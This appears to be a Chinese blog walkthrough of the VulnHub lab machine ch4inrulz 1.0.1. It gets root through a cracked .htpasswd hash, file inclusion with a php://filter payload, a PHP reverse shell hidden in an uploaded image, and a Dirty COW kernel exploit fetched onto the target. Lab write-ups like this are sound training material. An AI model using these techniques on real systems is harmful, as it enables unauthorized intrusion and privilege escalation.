VulnHub靶场学习:ch4inrulz 1.0.1

CH4INRULZ_v1.0.1

靶机下载地址: https://www.vulnhub.com/entry/ch4inrulz-101,247/

靶机说明:

Frank has a small website and he is a smart developer with a normal security background , he always love to follow patterns , your goal is to discover any critical vulnerabilities and gain access to the system , then you need to gain root access in order to capture the root flag.

This machine was made for Jordan’s Top hacker 2018 CTF , we tried to make it simulate a real world attacks in order to improve your penetration testing skills.

The machine was tested on vmware (player / workstation) and works without any problems , so we recommend to use VMware to run it , Also works fine using virtualbox.

Difficulty: Intermediate , you need to think out of the box and collect all the puzzle pieces in order to get the job done.

The machine is already got DHCP enabled , so you will not have any problems with networking.

Happy Hacking !

v1 - 25/07/2018 v1.0.1 - 31/07/2018 *Fixes DHCP Issue*

靶机难度:中级

运行环境:攻击机kali linux和主机  靶机CH4INRULZ

网络设置:均为Nat模式

目标:拿下靶机root权限和里面的flag

照惯例扫端口:

80端口  一份简历,都是个人介绍,没发现其他东西

8011端口:

 

 

 

ftp:空文件夹

目录扫描,先扫80端口

Robots文件:

bak文件,下载查看,发现有提示:

I will use frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 as the .htpasswd file to protect the development path

访问development,应该是需要提示部分的密码

8011端口:

api:只有files_api.php能访问

 

 

 

No parameter called file passed to me

提示没有传递名为file的参数,传参后,突如其来的检测:

改成Post形式,能成功查看passwd文件

 

 

然后没发现其他有用的东西

使用john尝试破解:frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0

 

破解成功,拿到密码frank!!!

访问development

 

* Here is my unfinished tools list

- the uploader tool (finished but need security review)

提示有上传点,在url后面添加uploader

任意上传一张图片,提示已传到uploads路径,但没找到这个路径是啥

试了许多绕过方式,但都没成功,看来只能上传图片

想起有个文件读取的地方,看能不能读取源码。

网站根目录一般为/var/www/html,这里尝试后发现是在/var/www/下

Php会解析,为了防止解析,使用php://filter读取包含漏洞脚本的源码

php://filter/read=convert.base64-encode/resource=[文件路径],经文件包含后,源码变成base64的形式:

 

Bese64解码后,从upload.php源码中找到了文件上传路径

使用常规的图片马反弹失败,为了能正常反弹,使用kali自带的php马

 

 

修改监听ip端口,将源码粘贴到任意一张图片后上传

 

 现在我将源码粘贴到一张名为muma.jpg的图片代码里

 

上传成功,kali开启监听

利用前面的文件包含漏洞,包含该图片马,成功拿到shell

接下来是提权,先查看内核版本

 

Linux kernel >= 2.6.22 用脏牛(https://github.com/FireFart/dirtycow)试一试,尝试不能直接下载github上的文件,先在kali下载并编译:

然后将dirty放到/var/www/html/目录下,kali开启web服务,在靶机上下载该文件

赋予权限后运行

直接切换账号失败,用xshell登陆,firefart:123456,成功

拿到了flag,完成。

 

posted @ 2020-03-06 15:42  hclly  阅读(553)  评论(0编辑  收藏  举报
Live2D